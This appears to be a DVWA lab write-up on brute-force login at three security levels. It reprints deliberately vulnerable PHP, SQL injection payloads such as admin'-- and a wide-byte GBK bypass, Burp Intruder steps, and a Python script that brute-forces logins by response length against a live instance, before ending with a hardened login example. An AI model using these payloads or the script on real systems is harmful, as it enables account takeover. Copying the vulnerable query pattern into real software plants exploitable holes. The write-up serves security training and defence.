Low
Source code is as follows:
<?php
if( isset( $_GET['Login'] ) ) {
    $user = $_GET['username'];
    $pass = $_GET['password'];
    $pass = md5($pass);
    // Both values go straight into the query string; no escaping, no attempt limit
    $qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
    // Note: the raw mysql_error() text is echoed back to the client on failure
    $result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $i=0; // Bug fix.
        $avatar = mysql_result( $result, $i, "avatar" );
        // Login Successful
        echo "<p>Welcome to the password protected area " . $user . "</p>";
        echo '<img src="' . $avatar . '" />';
    } else {
        // Login failed
        echo "<pre><br>Username and/or password incorrect.</pre>";
    }
    mysql_close();
}
?>
The code first checks whether the Login parameter is present, so the whole form is submitted via GET and the credentials travel in the URL (and land in browser history and server logs). The username and the md5() of the password are then concatenated straight into the SQL statement. Nothing counts or throttles attempts, so the login can be brute-forced, and because the username is not filtered at all it is also open to SQL injection: a username such as admin'-- (with a trailing space) or admin'# comments out the password check entirely. Note that the query has to return exactly one row, so a payload like ' OR 1=1 that matches every user is rejected by the mysql_num_rows() == 1 test. The die() branch additionally prints mysql_error() to the client, which hands an attacker the database's error messages.
Brute-forcing with Burp Suite: turn on interception in the Proxy tab, submit the login form with any credentials, and capture the request.
Right-click the captured request and choose "Send to Intruder".
In the Intruder Target tab, confirm the host (IP address) and port of the DVWA instance.
In the Positions tab clear the default markers and wrap only the password value in the § payload markers, since the password is the parameter being brute-forced; the username stays fixed (for example admin).
In the Payloads tab load a password dictionary, then start the attack.
When the attack finishes, sort the results by response length: the one request whose length differs from all the failed attempts is the successful login.
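The Intruder procedure above as a script, added here as an example and not part of the original write-up. It uses the same signal, a response length that differs from the failure baseline. The target it runs against offline is a constructed stand-in that mirrors the Low-level PHP; make_http_sender() shows the same attack against a live instance, where the URL, PHPSESSID cookie value and the use of the security=low cookie are assumptions about that deployment and are not exercised here.

```python
"""Brute-force a login by response-length oracle, the way Burp Intruder's
Length column is read.  Added example; the fake target is constructed."""
import hashlib
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

Sender = Callable[[str, str], str]   # (username, password) -> response body

# Constructed stand-in: same md5 compare and the same fixed response strings as
# the Low-level PHP, so a length comparison behaves like it does in Intruder.
_FAKE_USERS = {"admin": hashlib.md5(b"password").hexdigest()}

def fake_dvwa_low(username: str, password: str) -> str:
    if _FAKE_USERS.get(username) == hashlib.md5(password.encode()).hexdigest():
        return ('<p>Welcome to the password protected area %s</p>'
                '<img src="hackable/users/admin.jpg" />' % username)
    return "<pre><br>Username and/or password incorrect.</pre>"

def make_http_sender(brute_url: str, phpsessid: str) -> Sender:
    """Sender for a real DVWA instance (assumed URL such as
    http://dvwa.local/vulnerabilities/brute/ and an already logged-in
    PHPSESSID).  DVWA keeps the security level in a cookie."""
    def send(username: str, password: str) -> str:
        qs = urllib.parse.urlencode({"username": username,
                                     "password": password, "Login": "Login"})
        req = urllib.request.Request(
            brute_url + "?" + qs,
            headers={"Cookie": "PHPSESSID=%s; security=low" % phpsessid})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return send

def brute_force(username: str, candidates: Iterable[str], send: Sender) -> Optional[str]:
    """Replay one candidate per request.  A deliberately wrong guess gives the
    failure length; the first response of a different length is the hit."""
    baseline = len(send(username, "\x00not-the-password\x00"))
    for pw in candidates:
        if len(send(username, pw)) != baseline:
            return pw
    return None

if __name__ == "__main__":
    wordlist = ["123456", "letmein", "qwerty", "password", "admin"]   # constructed
    print("found:", brute_force("admin", wordlist, fake_dvwa_low))
```

The baseline length must come from a guaranteed miss; taking it from the first dictionary entry would break the oracle if that entry happened to be correct. Against the High level, whose failure branch sleeps for three seconds, the serial loop above simply becomes slow; the attack still works, only the throughput changes.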
Medium
Source code is as follows:
<?php
if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = mysql_real_escape_string( $user );
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );   // the query only ever sees a hex digest of the password
    $qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
    $result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
    if( $result && mysql_num_rows($result) == 1 ) {
        // Get users details
        $i=0; // Bug fix.
        $avatar = mysql_result( $result, $i, "avatar" );
        // Login Successful
        echo "<p>Welcome to the password protected area " . $user . "</p>";
        echo '<img src="' . $avatar . '" />';
    } else {
        // Login failed
        echo "<pre><br>Username and/or password incorrect.</pre>";
    }
    mysql_close();
}
?>
Compared with the Low level, the Medium code adds mysql_real_escape_string(), which backslash-escapes the special characters in a string (single and double quotes, backslashes, NUL, newlines) and is essentially enough to stop the SQL injection. "Essentially" because with MySQL versions up to 5.5.37, if the connection character set is set to GBK, a wide-byte payload (the classic %bf%27 trick) can swallow the escaping backslash and smuggle a single quote past mysql_real_escape_string(); the MySQL in my test environment was newer, so I did not verify this. The password is also passed through md5() after escaping, so the password parameter cannot carry an injection at all. What is still missing is any defence against brute force, so the Burp Suite procedure above applies unchanged and is not repeated here.
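To make the Low and Medium analyses above concrete, here is an added example (not DVWA's code) that rebuilds both queries in Python over an in-memory SQLite table and runs a few usernames through them. The user rows are constructed; SQLite stands in for MySQL, and because SQLite has no backslash escapes the Medium escaping is rendered as the standard quote doubling, which neutralises the same payloads that mysql_real_escape_string() does.

```python
"""Low vs Medium login query, rebuilt over SQLite.  Added example; user rows
and payloads are constructed, and escape() is a stand-in for
mysql_real_escape_string() (quote doubling, since SQLite lacks backslash escapes)."""
import hashlib
import sqlite3

def _fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE `users` (user TEXT, password TEXT, avatar TEXT)")
    db.executemany("INSERT INTO `users` VALUES (?, ?, ?)", [
        ("admin", hashlib.md5(b"password").hexdigest(), "admin.jpg"),
        ("gordonb", hashlib.md5(b"abc123").hexdigest(), "gordonb.jpg"),
    ])
    return db

def escape(s: str) -> str:
    """Stand-in for mysql_real_escape_string(): neutralise the string delimiter."""
    return s.replace("'", "''")

def run_login(qry: str) -> bool:
    rows = _fresh_db().execute(qry).fetchall()
    return len(rows) == 1            # DVWA's mysql_num_rows($result) == 1 test

def login_low(user: str, pw: str) -> bool:
    """Low level: raw string interpolation, the same string the PHP builds."""
    pw_hash = hashlib.md5(pw.encode()).hexdigest()
    return run_login("SELECT * FROM `users` WHERE user='%s' AND password='%s';"
                     % (user, pw_hash))

def login_medium(user: str, pw: str) -> bool:
    """Medium level: escape both fields first; hashing the password afterwards
    means no quote from the password field can ever reach the query."""
    pw_hash = hashlib.md5(escape(pw).encode()).hexdigest()
    return run_login("SELECT * FROM `users` WHERE user='%s' AND password='%s';"
                     % (escape(user), pw_hash))

if __name__ == "__main__":
    for payload in ["admin", "admin'-- ", "' OR 1=1-- "]:
        print("%-14r low=%-5s medium=%s" % (payload,
              login_low(payload, "wrong"), login_medium(payload, "wrong")))
```

Two things worth noticing when running it: admin'-- logs in at Low with any password because the comment removes the password clause, while ' OR 1=1-- fails even at Low, since it returns every user and the application insists on exactly one row; at Medium neither payload works, and the only remaining attack is guessing the password itself.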
High
Source code is as follows:
<?php
if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );            // undo any magic_quotes escaping before re-escaping
    $user = mysql_real_escape_string( $user );
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );
    $qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
    $result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $i=0; // Bug fix.
        $avatar = mysql_result( $result, $i, "avatar" );
        // Login Successful
        echo "<p>Welcome to the password protected area " . $user . "</p>";
        echo '<img src="' . $avatar . '" />';
    } else {
        // Login failed: a fixed delay, but no attempt counter or lockout
        sleep(3);
        echo "<pre><br>Username and/or password incorrect.</pre>";
    }
    mysql_close();
}
?>
The High level adds stripslashes(), which strips backslashes from the input before it is escaped (so that input already escaped by magic_quotes is not escaped twice), and a sleep(3) in the failure branch. The delay slows a single-threaded attack to one guess every three seconds but does not prevent it: nothing is counted and nothing is locked, so Intruder simply takes longer (or is run with more threads). Brute force with Burp Suite therefore still works exactly as before.
Suggested fix
Reprinted from Red Security's "DVWA vulnerability testing platform analysis":
- Change the login form to submit via POST and read the fields from $_POST, so credentials no longer appear in URLs and logs
- Add a random per-session token to the form to prevent CSRF
- Add a graphical CAPTCHA to the login; generate a new code for every submission and verify it on the server side
- Limit login attempts: lock out the username or the source IP after more than three failures, for a period ranging from 5 minutes to a few hours
- For management systems, restrict the IP range from which users are allowed to log in
- Add two-factor authentication through SMS or e-mail verification codes, and rate-limit those so the feature cannot be abused for SMS or e-mail bombing
- Protect passwords and other sensitive fields in transit (TLS), and store passwords as salted hashes rather than plain md5()
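The parts of that list that belong in the application itself, shown in one place as an added example rather than DVWA's or Red Security's code: POST only, a per-session CSRF token, a parameterised query, salted password hashing, and a counter that locks a username or a source IP for 5 minutes after 3 failures. User records and the clock are constructed or injected so it runs offline; the PBKDF2 round count is an assumption to be tuned for the deployment.

```python
"""Hardened login service.  Added example, not DVWA code; users, requests and
the clock are constructed so the behaviour can be exercised offline."""
import hashlib
import hmac
import os
import secrets
import sqlite3
import time
from collections import defaultdict
from typing import Callable, Dict, Optional, Tuple

LOCK_AFTER = 3            # failed attempts before lockout
LOCK_SECONDS = 300        # lockout window: 5 minutes
PBKDF2_ROUNDS = 100_000   # assumption: tune for the deployment hardware

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as 'pbkdf2$<salt>$<hash>'."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "pbkdf2$%s$%s" % (salt.hex(), dk.hex())

def verify_password(password: str, stored: str) -> bool:
    _, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison

# Verified against when the username does not exist, so an unknown user costs
# the same time as a wrong password (no username enumeration via timing).
_DUMMY_HASH = hash_password(secrets.token_hex(16))

class LoginService:
    def __init__(self, users: Dict[str, str], now: Callable[[], float] = time.time):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users (user TEXT PRIMARY KEY, password TEXT)")
        self.db.executemany("INSERT INTO users VALUES (?, ?)",
                            [(u, hash_password(p)) for u, p in users.items()])
        self.now = now
        self.failures = defaultdict(list)   # ('user', name) / ('ip', addr) -> timestamps
        self.sessions: Dict[str, str] = {}  # session id -> CSRF token

    def new_session(self) -> Tuple[str, str]:
        sid, token = secrets.token_hex(16), secrets.token_hex(16)
        self.sessions[sid] = token
        return sid, token

    def _locked(self, key) -> bool:
        cutoff = self.now() - LOCK_SECONDS
        self.failures[key] = [t for t in self.failures[key] if t > cutoff]
        return len(self.failures[key]) >= LOCK_AFTER

    def login(self, method: str, sid: str, csrf: str, ip: str,
              user: str, password: str) -> str:
        if method != "POST":
            return "method not allowed"
        token = self.sessions.get(sid)
        if token is None or not hmac.compare_digest(token, csrf):
            return "bad csrf token"
        if self._locked(("user", user)) or self._locked(("ip", ip)):
            return "locked out"
        # Parameterised query: the username can never alter the SQL structure.
        row = self.db.execute("SELECT password FROM users WHERE user = ?",
                              (user,)).fetchone()
        stored = row[0] if row else _DUMMY_HASH
        if verify_password(password, stored) and row is not None:
            self.failures.pop(("user", user), None)
            return "ok"
        # Count the miss against both the account and the client address.
        stamp = self.now()
        self.failures[("user", user)].append(stamp)
        self.failures[("ip", ip)].append(stamp)
        return "failed"
```

Locking on the username as well as the IP matters: a distributed attack rotates source addresses, while a per-user lock still caps the guesses per account. The trade-off is that an attacker can deliberately lock out a known account, which is why the lock is short and why a CAPTCHA or second factor is the better long-term control.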